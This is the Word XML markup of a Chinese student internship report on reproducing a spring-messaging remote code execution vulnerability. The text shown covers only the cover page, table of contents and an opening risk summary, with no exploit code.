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F4142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</w:p>
    <w:p w14:paraId="53875C50" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="0AED5304" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="4D966DC9" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFE8DBD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26905DB5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0B67BEA0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2608B9BF" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CAA203" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B62DD2" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F08BE3C" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D76E1D4" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C280A5" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CE12E2" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B732E2" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F27C637" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EC1C13" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FDD48E" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD00249" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F474ED" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="7E3669BB" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="08832FA3" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC727B4" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124AF3AB" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6072A157" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A4659E" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DB1E2A" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="0220FAD7" w14:textId="5F6FF9C3" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17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cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="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>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>25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4643CBD1" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17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31EEF63B" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C1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3AA5FDFE" w14:textId="43263274" w:rsidR="0078134A" w:rsidRDefault="00B50C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14:ligatures w14:val="standardContextual"/>
            </w:rPr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173000405" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现结论（</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分）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_Toc173000405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1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D0DCA0D" w14:textId="713941C1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06" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>风险等级分布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_Toc173000406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1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="650D00DA" w14:textId="3236787B" w:rsidR="0078134A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14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc173000407" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>工作计划（</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分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_Toc173000407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1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EE6AAE0" w14:textId="1412BD1E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08" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>工作人员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_Toc173000408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1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32361AA2" w14:textId="421A335D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09" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞对象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_Toc173000409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1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60A888B9" w14:textId="75A5BDFF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0" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现阶段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_Toc173000410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2</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C92132C" w14:textId="3AA49881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1" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>风险等级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_Toc173000411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2</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AF66363" w14:textId="23A8235F" w:rsidR="0078134A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14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc173000412" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现过程（</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分）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_Toc173000412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2</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="694FB616" w14:textId="15A73156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3" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>风险管理及规避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_Toc173000413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3</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32096420" w14:textId="20E94D5F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4" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>测试方法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_Toc173000414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3</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D52FC50" w14:textId="43CAA88E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5" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>测试中所用的工具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_Toc173000415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4</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63A656FC" w14:textId="3D4119FB" w:rsidR="0078134A" w:rsidRDefault="00000000" w:rsidP="0078134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14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc173000416" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现结果（</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分）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_Toc173000416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4</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F63FE26" w14:textId="1A7214EE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7" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 POC</w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>插件编写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_Toc173000417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4</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A19FAA1" w14:textId="59883D09" w:rsidR="0078134A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14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc173000418" w:history="1">
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4.2 </w:t>
            </w:r>
            <w:r w:rsidR="0078134A" w:rsidRPr="00767C7D">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞信息</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc173000418 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0078134A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AFDA35D" w14:textId="11B0D206" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2F710007" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1ACCD5" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="2830DB60" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr w:rsidR="00B50C17" w:rsidSect="00B50C17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5CBD1A" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc173000405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01CF7660" w14:textId="0EB56792" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17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南开大学实习实训第五组的安全人员采用科学的漏洞复现步骤于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2024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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2024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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C17">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>spring-messaging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFCF1F5" w14:textId="2ED4340C" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17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r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>低危漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C17"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4584"/>
        <w:gridCol w:w="2156"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B50C17" w14:paraId="35BE12CD" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1556" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18DAF683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584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="232FB40B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781AC32A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B50C17" w14:paraId="3774B752" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1556" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57E415B8" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="005B6830">
            <w:pPr>
              <w:pStyle w:val="a7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584" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6422061D" w14:textId="10944E77" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="005B683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 w:rsidRPr="00B50C17">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>spring-messaging</w:t>
            </w:r>
            <w:r w:rsidRPr="00B50C17">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>远程代码执行漏洞预警</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2156" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08517150" w14:textId="2492ECDF" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="005B683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</w:tbl>
    <w:p w14:paraId="4139C895" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc173000406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60D0CAF4" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：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41909" w14:paraId="3F709355" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="00E9F5A5" w14:textId="3A5D83B4" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2A815A43" w14:textId="309263B6" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00441909" w14:paraId="1A814114" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5CD104CC" w14:textId="004E87B7" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击复杂度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59B1F141" w14:textId="5FB92543" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909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441909" w14:paraId="26A93F66" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BAA5668" w14:textId="4BD1C6EF" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="00C1D231" w14:textId="54F86EAE" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>无需权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00441909" w14:paraId="3E4E1EF7" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45F1FC3B" w14:textId="7390C547" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr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500" w:type="pct"/>
          </w:tcPr>
